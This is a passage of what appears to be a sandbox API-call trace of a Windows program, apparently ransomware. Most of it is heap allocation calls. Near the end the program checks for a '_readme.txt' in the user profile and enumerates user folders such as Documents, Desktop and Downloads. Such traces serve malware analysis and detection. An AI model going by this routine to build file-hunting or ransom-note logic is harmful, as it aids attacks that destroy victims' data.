Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.944] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0179.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0179.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.944] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0179.944] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.944] PathFindFileNameW (pszPath="") returned="" [0179.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.944] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0179.945] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0179.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0179.945] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0179.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.946] FreeLibrary (hLibModule=0x759d0000) returned 1 [0179.946] PathAppendW (in: pszPath="C:\\Users\\kEecfMwgj\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\_readme.txt") returned 1 [0179.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0179.946] PathFileExistsW (pszPath="C:\\Users\\kEecfMwgj\\_readme.txt") returned 1 [0179.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0179.947] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\*" (normalized: "c:\\users\\keecfmwgj\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe140cf30, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xe140cf30, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0179.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0179.947] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe140cf30, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xe140cf30, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.947] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0179.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0179.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27fb8 [0179.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0179.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0179.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.966] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0179.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0179.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0179.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x38) returned 0x2cbfa50 [0179.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0179.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0179.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0179.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0179.968] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0179.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0179.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0179.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x54) returned 0x2bf9bd8 [0179.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0179.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0179.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0179.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cbfa50 | out: hHeap=0x6a0000) returned 1 [0179.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0179.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0179.970] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0179.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0179.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0179.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0179.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0179.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0179.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0179.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f438 | out: hHeap=0x6a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0179.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0179.972] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x95f69be0, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0x95f69be0, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0179.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0179.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0179.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa8) returned 0x2c2d920 [0179.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0179.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0179.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3f0 [0179.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0179.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0179.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0179.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0179.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0179.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0179.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0179.974] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x992af670, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x992af670, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0179.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0179.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0179.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0179.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0179.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0179.975] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0179.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0179.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0179.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfc) returned 0x2c70bc8 [0179.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0179.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0179.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0179.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6dd950 [0179.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6dd8c0 [0179.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30688 [0179.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f438 | out: hHeap=0x6a0000) returned 1 [0179.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0179.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3f0 | out: hHeap=0x6a0000) returned 1 [0179.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0179.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0179.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0179.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0179.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0179.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0179.978] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0179.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0179.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 